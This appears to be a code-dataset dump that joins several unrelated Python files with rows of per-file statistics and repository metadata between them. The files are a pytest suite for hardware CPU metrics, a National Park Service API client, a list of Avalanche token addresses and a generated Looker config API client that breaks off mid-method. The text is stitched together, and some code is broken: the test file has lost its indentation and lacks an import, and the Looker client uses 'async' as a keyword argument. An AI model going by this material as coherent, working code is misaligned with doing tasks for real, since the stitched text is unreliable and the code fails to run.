from AutomationFramework.page_objects.hardware.hardware import Hardware
from AutomationFramework.tests.base_test import BaseTest
class TestHardwareCPU(BaseTest):
test_case_file = 'hw_cpu.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_avg',
'page_object_class': Hardware}])
def test_hw_cpu_avg(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_instant',
'page_object_class': Hardware}])
def test_hw_cpu_instant(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_interval',
'page_object_class': Hardware}])
def test_hw_cpu_interval(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_max',
'page_object_class': Hardware}])
def test_hw_cpu_max(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_max_time',
'page_object_class': Hardware}])
def test_hw_cpu_max_time(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_min',
'page_object_class': Hardware}])
def test_hw_cpu_min(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'hw_cpu_min_time',
'page_object_class': Hardware}])
def test_hw_cpu_min_time(self, create_page_object):
create_page_object.execute_get_test_case_with_dispatch()
assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
| 65.052632
| 106
| 0.628641
| 422
| 3,708
| 4.921801
| 0.092417
| 0.165624
| 0.26962
| 0.107848
| 0.898893
| 0.898893
| 0.898893
| 0.898893
| 0.848339
| 0.771305
| 0
| 0
| 0.294498
| 3,708
| 56
| 107
| 66.214286
| 0.79396
| 0
| 0
| 0.595745
| 0
| 0
| 0.153182
| 0.041532
| 0
| 0
| 0
| 0
| 0.148936
| 1
| 0.148936
| false
| 0
| 0.06383
| 0
| 0.255319
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99659c29885112050104992cd94fb81f49525c41
| 13,010
|
py
|
Python
|
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
import requests
class NPS():
"""
This is a class for making HTTP requests for National Park Service API.
Parameters
----------
API_KEY: str
a string that you get from National Park Service Developer portal.
"""
def __init__(self, API_KEY):
self.base_url = "https://developer.nps.gov/api/v1"
self.API_KEY = API_KEY
def get_query_params(self, payload={}):
"""
Generate a set of query parameters to authenticate a request.
Parameters
----------
payload: dict
A dictionary that includes query parameters. Must pass apikey
parameter. The default values include apikey and limit. The limit
is set to 100.
Returns
-------
dict
A dictionary that includes baisc query parameters.
"""
payload['api_key'] = self.API_KEY
payload['limit'] = 100
return payload
def get_categories_of_activities(self, payload=None):
"""
Retrieve categories of activities (astronomy, hiking, wildlife watching
, etc.) possible in national parks.
Parameters
----------
payload: dict
A dictionary that includes query parameters. This parameter is not
necessary. But you could include additional parameters. For
example, if you want to search some activities, you can pass q
into parameters.
Returns
-------
dict
"""
if payload is None:
payload = {}
url = self.base_url + "/activities"
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_park_information(self, parkcode=None, statecode=None,
start=None, q=""):
"""
Retrieve data about national parks (address, contacts, description,
hours of operation, etc)
Parameters
----------
parkcode: str
A comma delimited list of park codes (each 4-10 characters in
length).
statecode: str
A comma delimited list of 2 character state codes.
start: int
Get the next 100 results starting with this number. Deafult is 0.
q: str
Term to search on
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/parks"
if start is None:
payload['start'] = 0
if not (start is None):
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print('Please check your input values for start.')
return None
else:
payload['start'] = start
if not (parkcode is None):
payload.update({'parkCode': parkcode})
if not (statecode is None):
payload.update({'stateCode': statecode})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_vistorcenters(self, parkcode=None, statecode=None,
start=None, q=""):
"""
Retrieve data about National Park Service visitor centers including
addresses, contacts, description, hours of operation, etc.
Parameters
----------
parkcode: str
A comma delimited list of park codes (each 4 characters in length).
statecode: str
A comma delimited list of 2 character state codes.
start: int
Get the next 100 results starting with this number. Deafult is 0.
q: str
Term to search on
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/visitorcenters"
if start is None:
payload['start'] = 0
if not (start is None):
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print('Please check your input values for start.')
return None
else:
payload['start'] = start
if not (parkcode is None):
payload.update({'parkCode': parkcode})
if not (statecode is None):
payload.update({'statecode': statecode})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_campgrounds(self, parkcode=None, statecode=None,
start=None, q=""):
"""
Retrieve data about National Park Service campgrounds including
addresses, contacts, description, hours of operation, etc.
Parameters
----------
parkcode: str
A comma delimited list of park codes (each 4 characters in length).
statecode: str
A comma delimited list of 2 character state codes.
start: int
Get the next 100 results starting with this number. Deafult is 0.
q: str
Term to search on
Returns
-------
dict
"""
payload = {}
url = self.base_url + '/campgrounds'
if not (start is None):
payload['start'] = start
else:
payload['start'] = 0
if not (parkcode is None):
payload.update({'parkCode': parkcode})
if not (statecode is None):
payload.update({'stateCode': statecode})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_categories_of_topics(self, id="", q="", start=None):
"""
Retrieve categories of topics (American revolution, music, women's
history, etc.) relating to national parks.
Parameters
----------
id: str
Topic ID.
q: str
A string to search for.
start: int
Get the next 100 results starting with this number. Deafult is 0 if
you do not sepecify.
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/topics"
if start is None:
payload['start'] = 0
if not (start is None):
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print('Please check your input values for start.')
return None
else:
payload['start'] = start
if id == "":
pass
else:
payload.update({'id': id})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_topics_related_parks(self, id="", q="", start=None):
"""
Retrieve national parks taht are related to particular categories of
topics (American revolution, music, women's history, etc.)
Parameters
----------
id: str
Topic ID.
q: str
A string to search for.
start: int
Get the next 100 results starting with this number. Default is 0 if
you do not specify.
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/topics/parks"
if start is None:
payload['start'] = 0
if not (start is None):
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print("Please check your input values for start.")
return None
else:
payload['start'] = start
if id == "":
pass
else:
payload.update({'id': id})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_amenities_types(self, id="", q="", start=None):
"""
Retrieve the amenity types (accessible restrooms, fire pit, picnic
area, etc.) available in national parks.
Parameters
----------
id: str
Topic unique ID.
q: str
A string to search for.
start: int
Get the next 100 results starting with this number. Default is 0 if
you do not specify.
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/amenities"
if start is None:
payload['start'] = 0
if not (start is None):
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print("Please check your input values for start.")
return None
else:
payload['start'] = start
if id == "":
pass
else:
payload.update({'id': id})
if q == "":
pass
else:
payload.update({'q': q})
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
def get_amenities_places_within_parks(self, parkcode=None,
id="", q="", start=None):
"""
Retrieve "places" within national parks that have different amenities.
Parameters
----------
parkcode: str
4 character park code.
id: str
Amenity ID.
q: str
A string to search for.
start: int
Get the next 100 results starting with this number. Deafult is 0 if
you do not specify.
Returns
-------
dict
"""
payload = {}
url = self.base_url + "/amenities/parksplaces"
if start is None:
payload['start'] = 0
else:
try:
if isinstance(start, (str, float)):
raise TypeError
if start < 0:
raise ValueError
except (TypeError, ValueError):
print("Plase check your input values for start.")
return None
else:
payload['start'] = start
if id == "":
pass
else:
payload.update({'id': id})
if q == "":
pass
else:
payload.update({'q': q})
if not (parkcode is None):
payload.update({'parkCode': parkcode})
query = self.get_query_params(payload=payload)
response = requests.get(url, params=query)
status_code = response.status_code
if status_code != 200:
raise Exception("Something went wrong.")
else:
return response.json()
| 31.199041
| 79
| 0.509224
| 1,342
| 13,010
| 4.877049
| 0.134128
| 0.036669
| 0.029794
| 0.035294
| 0.818029
| 0.801375
| 0.783346
| 0.779374
| 0.772651
| 0.747288
| 0
| 0.010345
| 0.398155
| 13,010
| 416
| 80
| 31.274038
| 0.825543
| 0.267948
| 0
| 0.876068
| 0
| 0
| 0.083483
| 0.002635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042735
| false
| 0.047009
| 0.004274
| 0
| 0.115385
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99aa6f7799d0700b5fbdc5882204c8643ea3181b
| 346
|
py
|
Python
|
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
WAVAX = "0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7"
PNG = "0x60781c2586d68229fde47564546784ab3faca982"
WETH = "0x49d5c2bdffac6ce2bfdb6640f4f80f226bc10bab" # WETH.e
DAI = "0xd586e7f844cea2f87f50152665bcbc2c279d8d70" # DAI.e
USDC = "0xa7d7079b0fead91f3e65f86e8915cb59c1a4c664" # USDC.e
USDT = "0xc7198437980c041c805a1edcba50c1ce5db95118" # USDT.e
| 49.428571
| 60
| 0.849711
| 20
| 346
| 14.7
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.48125
| 0.075145
| 346
| 6
| 61
| 57.666667
| 0.4375
| 0.075145
| 0
| 0
| 0
| 0
| 0.8
| 0.8
| 0
| 0
| 0.8
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
852cb8de01ccbd12b51481246c1980ddc6c397df
| 34,963
|
py
|
Python
|
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from looker_client_31.api_client import ApiClient
class ConfigApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def all_legacy_features(self, **kwargs): # noqa: E501
"""Get All Legacy Features # noqa: E501
### Get all legacy features. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_legacy_features(async=True)
>>> result = thread.get()
:param async bool
:return: list[LegacyFeature]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_legacy_features_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.all_legacy_features_with_http_info(**kwargs) # noqa: E501
return data
def all_legacy_features_with_http_info(self, **kwargs): # noqa: E501
"""Get All Legacy Features # noqa: E501
### Get all legacy features. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_legacy_features_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[LegacyFeature]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_legacy_features" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/legacy_features', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[LegacyFeature]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def all_timezones(self, **kwargs): # noqa: E501
"""Get All Timezones # noqa: E501
### Get a list of timezones that Looker supports (e.g. useful for scheduling tasks). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_timezones(async=True)
>>> result = thread.get()
:param async bool
:return: list[Timezone]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.all_timezones_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.all_timezones_with_http_info(**kwargs) # noqa: E501
return data
def all_timezones_with_http_info(self, **kwargs): # noqa: E501
"""Get All Timezones # noqa: E501
### Get a list of timezones that Looker supports (e.g. useful for scheduling tasks). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.all_timezones_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[Timezone]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_timezones" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/timezones', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Timezone]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def backup_configuration(self, **kwargs): # noqa: E501
"""Get Backup Configuration # noqa: E501
### Get the current Looker internal database backup configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.backup_configuration(async=True)
>>> result = thread.get()
:param async bool
:return: BackupConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.backup_configuration_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.backup_configuration_with_http_info(**kwargs) # noqa: E501
return data
def backup_configuration_with_http_info(self, **kwargs): # noqa: E501
"""Get Backup Configuration # noqa: E501
### Get the current Looker internal database backup configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.backup_configuration_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: BackupConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method backup_configuration" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/backup_configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BackupConfiguration', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def legacy_feature(self, legacy_feature_id, **kwargs): # noqa: E501
"""Get Legacy Feature # noqa: E501
### Get information about the legacy feature with a specific id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.legacy_feature(legacy_feature_id, async=True)
>>> result = thread.get()
:param async bool
:param int legacy_feature_id: id of legacy feature (required)
:return: LegacyFeature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.legacy_feature_with_http_info(legacy_feature_id, **kwargs) # noqa: E501
else:
(data) = self.legacy_feature_with_http_info(legacy_feature_id, **kwargs) # noqa: E501
return data
def legacy_feature_with_http_info(self, legacy_feature_id, **kwargs): # noqa: E501
"""Get Legacy Feature # noqa: E501
### Get information about the legacy feature with a specific id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.legacy_feature_with_http_info(legacy_feature_id, async=True)
>>> result = thread.get()
:param async bool
:param int legacy_feature_id: id of legacy feature (required)
:return: LegacyFeature
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['legacy_feature_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method legacy_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'legacy_feature_id' is set
if ('legacy_feature_id' not in params or
params['legacy_feature_id'] is None):
raise ValueError("Missing the required parameter `legacy_feature_id` when calling `legacy_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'legacy_feature_id' in params:
path_params['legacy_feature_id'] = params['legacy_feature_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/legacy_features/{legacy_feature_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LegacyFeature', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_backup_configuration(self, body, **kwargs): # noqa: E501
"""Update Backup Configuration # noqa: E501
### Update the Looker internal database backup configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_backup_configuration(body, async=True)
>>> result = thread.get()
:param async bool
:param BackupConfiguration body: Options for Backup Configuration (required)
:return: BackupConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_backup_configuration_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.update_backup_configuration_with_http_info(body, **kwargs) # noqa: E501
return data
def update_backup_configuration_with_http_info(self, body, **kwargs): # noqa: E501
"""Update Backup Configuration # noqa: E501
### Update the Looker internal database backup configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_backup_configuration_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param BackupConfiguration body: Options for Backup Configuration (required)
:return: BackupConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_backup_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_backup_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/backup_configuration', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BackupConfiguration', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_legacy_feature(self, legacy_feature_id, body, **kwargs): # noqa: E501
"""Update Legacy Feature # noqa: E501
### Update information about the legacy feature with a specific id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_legacy_feature(legacy_feature_id, body, async=True)
>>> result = thread.get()
:param async bool
:param int legacy_feature_id: id of legacy feature (required)
:param LegacyFeature body: Legacy Feature (required)
:return: LegacyFeature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_legacy_feature_with_http_info(legacy_feature_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_legacy_feature_with_http_info(legacy_feature_id, body, **kwargs) # noqa: E501
return data
def update_legacy_feature_with_http_info(self, legacy_feature_id, body, **kwargs): # noqa: E501
"""Update Legacy Feature # noqa: E501
### Update information about the legacy feature with a specific id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_legacy_feature_with_http_info(legacy_feature_id, body, async=True)
>>> result = thread.get()
:param async bool
:param int legacy_feature_id: id of legacy feature (required)
:param LegacyFeature body: Legacy Feature (required)
:return: LegacyFeature
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['legacy_feature_id', 'body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_legacy_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'legacy_feature_id' is set
if ('legacy_feature_id' not in params or
params['legacy_feature_id'] is None):
raise ValueError("Missing the required parameter `legacy_feature_id` when calling `update_legacy_feature`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_legacy_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'legacy_feature_id' in params:
path_params['legacy_feature_id'] = params['legacy_feature_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/legacy_features/{legacy_feature_id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LegacyFeature', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_whitelabel_configuration(self, body, **kwargs): # noqa: E501
"""Update Whitelabel configuration # noqa: E501
### Update the whitelabel configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_whitelabel_configuration(body, async=True)
>>> result = thread.get()
:param async bool
:param WhitelabelConfiguration body: Whitelabel configuration (required)
:return: WhitelabelConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_whitelabel_configuration_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.update_whitelabel_configuration_with_http_info(body, **kwargs) # noqa: E501
return data
def update_whitelabel_configuration_with_http_info(self, body, **kwargs): # noqa: E501
"""Update Whitelabel configuration # noqa: E501
### Update the whitelabel configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_whitelabel_configuration_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param WhitelabelConfiguration body: Whitelabel configuration (required)
:return: WhitelabelConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_whitelabel_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_whitelabel_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
